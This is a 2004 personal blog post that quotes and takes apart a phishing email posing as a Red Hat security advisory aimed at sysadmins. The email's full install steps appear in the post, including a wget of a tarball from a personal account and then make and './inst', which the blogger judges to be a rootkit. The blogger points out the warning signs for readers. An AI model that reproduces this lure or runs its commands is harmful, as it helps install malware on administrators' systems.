a weblog by dave walker
daddy needs a new pair of shoes
search
what I'm up to
35340 Van Dyke Ave, Sterling Heights, MI 48312
stalker-enable yr. blog @ eaglefeed
edumacation
what I'm playing
style
greatest hits
- Little. Orange. Stupid.
- Escaping The Madness
- Escaping The Madness, Part Two
- An Ode To The Single
- The Flinstones Smoke Winston
- Living In The Future
- Dollar DVDs
- Observations on the ‘nofollow’ tag
- The Clash: Hitsville, U.K.
the important stuff
bloghome
ffg station page
freeke.org
my flickr photos
@ffg
more links
amazon wish list (xml)
pgp (0x0212C246)
your host
b-links
via del.icio.us
(feed)
hover for obnoxious commentary
- freeform goodness :: misc : Makes My Poor Head Pound
- freeform goodness :: personal : pets : Little Fishies In Morning Light
- bar bands of the 1970s: a picture thread
- 68 Fantastic British Names Gathered While Watching BBC Credits Over the Years - The Awl
- Clive Thompson on the Death of the Phone Call | Magazine
- nectarine brown butter buckle | smitten kitchen
- Picture Show: Absence of Water - Issue 016 - GOOD
- MagicPrefs
- Oil spill glows under UV light - Boing Boing
- Detroit Continues to Inspire Techno Music Producer - Wheels Blog - NYTimes.com
Saturday, October 23, 2004
Redhat Phish
Looks like phishers are even going after sysadmins. Very interesting… I got the following email last night, sent to my webmaster account:
Original issue date: October 20, 2004
Last revised: October 20, 2004
Source: RedHatA complete revision history is at the end of this file.
Dear RedHat user,
Redhat found a vulnerability in fileutils (ls and mkdir), that could allow a remote attacker to execute arbitrary code with root privileges. Some of the affected linux distributions include RedHat 7.2, RedHat 7.3, RedHat 8.0, RedHat 9.0, Fedora CORE 1, Fedora CORE 2 and not only. It is known that *BSD and Solaris platforms are NOT affected.
The RedHat Security Team strongly advises you to immediately apply the fileutils-1.0.6 patch. This is a critical-critical update that you must make by following these steps:
- First download the patch from the Stanford RedHat mirror: wget www.stanford.edu/~joeio/fileutils-1.0.6.patch.tar.gz
- Untar the patch:tar zxvf fileutils-1.0.6.patch.tar.gz
- cd fileutils-1.0.6.patch
- make
- ./inst
Again, please apply this patch as soon as possible or you risk your system and others` to be compromised.
Thank you for your prompt attention to this serious matter,
RedHat Security Team.
Copyright © 2004 Red Hat, Inc. All rights reserved.
Very credible looking, except for a few little niggles:
- Note that the “patch” (almost certainly a rootkit) is linked to an individual user’s (“joeio”) account
- I seriously doubt that Redhat would be relaying through a
random machine in Taiwan:
Received: from mail.forcartex.com.tw (unknown [211.22.18.59]) by samantha.freeke.org (Postfix) with ESMTP id A355FFC7C39 for daddy@freeke.org; Sat, 23 Oct 2004 03:11:53 -0400 (EDT)
Anyway, I thought this was notable — I’ve seen phishes like this targeted at Windows users, but this is the first I’ve seen specifically targeting ‘nix admins. One would assume that they just collected a bunch of webmaster addresses, figuring (probably correctly) that a fair number of those boxes would be running Redhat. The email shows an attention to detail — the HTML links to Redhat’s real logo, linked from a Redhat server, and they even ran their HTML through Tidy!
Let’s be careful out there!
:: Dave Walker 23:55 (EST/EDT) [+] ::
:: [/tech/computers/security]
:: tags: security
:: Comments (3)
Comments:
Title:
Date:
That and the fact that ls and mkdir have absolutely no network code. :)
Title: Red Hat Social Exploit Deconstruction
Date:
Morning my loyal readers, today I plan to deconstruct the recent Social Engineering email that has been circulating the net today. There are no known users who have fallen for this fishing trick, yet it is possible that it has effected someone. ...
Title: On /. now...
Date:
It’s evolved a bit.
CAPRICORN (Dec. 22 to Jan. 19) Follow your instincts. You are much too scatterbrained to do anything else, such as think. Romance is in the air, but not for you, so forget it. That pimple on the end of your nose will get worse.